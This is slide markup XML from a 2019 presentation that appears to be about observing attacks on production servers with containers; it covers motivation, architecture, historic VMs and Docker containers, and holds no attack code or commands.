            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Slide Number Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE6F250C-9BFC-2849-B1D1-EF3475FEE799}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31811735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A0BCA-AE9E-FE48-AC4D-01D8DBDB96C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE85161F-4095-C848-9733-36A469DCF2D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To know how your production servers are being attacked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To find previously-unknown attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{998391B2-17C2-8B4F-AFA7-03E4BD844BFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F88AAD1D-ADA2-554C-B2F5-504A31152541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00DF12D2-4480-D24D-BB53-C6F3C9738D6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5318574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BCC90-1F72-C84C-A3DD-56BCD0F66BBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thanks!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{689C4C92-F072-8F4B-A317-BADB70AA95AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{483FFE85-34B4-3146-AF5E-0EBB80A8B172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB53B044-681A-6C47-A4A4-BFF667867E3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89AF0BC7-DD6B-4545-88CD-B8BD5FE1AD47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30209470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9196-158B-9543-8331-6752AD03C47D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="A glass of orange juice&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F05F853F-434A-9348-BBC4-71D302E7B724}"/>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4833112" y="1415704"/>
            <a:ext cx="1640840" cy="1156046"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Date Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{557FBFD3-8ED8-E245-B59C-794A88A4A486}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Footer Placeholder 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{731805AB-B7B2-6342-AD82-A1CF52DB6654}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Slide Number Placeholder 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5F096AA-F7CF-2E4A-87A3-DAD934912778}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Cloud 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8EA2AD6-188A-6C41-9577-2CFC5EC0A8D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394339" y="1722325"/>
            <a:ext cx="2567708" cy="1977656"/>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5D31CE4-20E8-A94A-8D32-1C6AFF1F1742}"/>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326273" y="2919563"/>
            <a:ext cx="976991" cy="1393369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D6AA784-6774-4044-BE49-24AF3F24B56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022592" y="1297042"/>
            <a:ext cx="976991" cy="1393369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Left-Right Arrow 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27406F22-2302-454B-8F08-25F6B0400BDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6045601" y="1883307"/>
            <a:ext cx="976991" cy="390144"/>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Lightning Bolt 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA12C8B8-1459-8F4A-A6C2-C8C73E1AA2A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18721159">
            <a:off x="3995971" y="1785002"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="lightningBol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Left-Right Arrow 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFDC10A5-00E0-604C-8748-EA039756DF3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1340160">
            <a:off x="3731447" y="3292217"/>
            <a:ext cx="1599041" cy="390144"/>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43786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84CDF-D881-0944-80FC-F05E25D018FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Historic VMs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="A screenshot of a cell phone&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A94318-54DA-0245-94C0-96346B628132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2445378" y="1187958"/>
            <a:ext cx="4253244" cy="3394075"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4A615FC-38B0-124C-B4E2-0D2C4ECC66ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAE4ECCC-3F89-984D-96FE-BAD24E7DE33F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{882DE3D5-0DF0-2445-83B3-469F60657DEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28887393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71451-FC7A-024C-A1B3-4A762700F9ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Containers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="A screenshot of a cell phone&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD64D1C0-CDB0-F344-834A-151B0718E6C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2611366" y="1200150"/>
            <a:ext cx="3921267" cy="3394075"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50AEF749-C6E5-FA45-A02E-4EAC5F16FF3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18084BAC-5559-E24D-9077-11CECE3AF83F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F71F6E-7F30-7D43-83BF-D672F2B3F7AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17055663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65C79-AFCC-1A4F-AD92-BA696D50C2CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>docker.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB9AF652-CBEF-C248-8B53-B237763041F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Standard: Docker created the industry standard for containers, so they could be portable anywhere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lightweight: Containers share the machine’s OS system kernel and therefore do not require an OS per application, driving higher server efficiencies and reducing server and licensing costs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure: Applications are safer in containers and Docker provides the strongest default isolation capabilities in the industry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4323D15-53CD-6241-BD38-DFB703CA3AC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58B34685-34F8-2C48-A345-76D8C6E6CC9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EE99FBD-50F9-854F-99CA-D8300FE02582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
